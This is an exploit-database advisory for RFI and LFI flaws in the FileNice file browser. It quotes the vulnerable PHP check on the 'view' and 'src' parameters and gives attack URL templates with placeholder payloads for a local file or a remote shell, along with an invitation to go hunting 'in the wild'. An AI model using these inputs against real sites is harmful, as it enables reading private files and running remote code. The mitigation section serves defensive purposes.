header-logo
Suggest Exploit
vendor:
FileNice file browser
by:
e.wiZz!
8.8
CVSS
HIGH
Remote File Inclusion (RFI) & Local File Inclusion (LFI)
98
CWE
Product Name: FileNice file browser
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

FileNice file browser RFI&LFI

FileNice file browser is vulnerable to RFI and LFI attacks. The index.php file contains a security check for directory traversal, however, there is no check for RFI. An attacker can exploit this vulnerability by sending a malicious URL to the vulnerable application. This URL can contain a remote shell or a local file inclusion payload which can be used to gain access to the system.

Mitigation:

Input validation should be used to prevent RFI and LFI attacks. All user-supplied input should be validated and filtered before being used in the application. Additionally, the application should be configured to only allow access to files and directories that are necessary for the application to function.
Source

Exploit-DB raw data:

FileNice file browser RFI&LFI


By: e.wiZz!

#######Script site: http://filenice.com




In the wild...

###################################

######Vulnerability:


index.php

...
if(isset($_GET['view'])){
	if(substr($_GET['view'],0,2) != ".." && substr($_GET['view'],0,1) != "/" && $_GET['view'] != "./" && !stristr($_GET['view'], '../')){
		$out = new FNOutput;
		$out->viewFile($_GET['view']);
	}else{
		// someone is poking around where they shouldn't be
		echo("Don't hack my shit yo.");
		exit;	
	}
}else if(isset($_GET['src'])){
	if(substr($_GET['src'],0,2) != ".." && substr($_GET['src'],0,1) != "/" && $_GET['src'] != "./" && !stristr($_GET['src'], '../')){
		$out = new FNOutput;
		$out->showSource($_GET['src']);
	}else{
		// someone is poking around where they shouldn't be
		echo("Don't hack my shit yo.");
		exit;	
	}

...

here is some security check for dir-traversal(can be bypassed),but there is no check for RFI,
also you can see source of any file which is in parent directory:

http://inthewild/path/index.php?src=[lfi]   // index.php or whatever
http://inthewild/path/index.php?src=[remote shell]

btw. there is lot of other vulnerabilities...happy huntin' :)

Navigation

Suggest Exploit

Services By CQR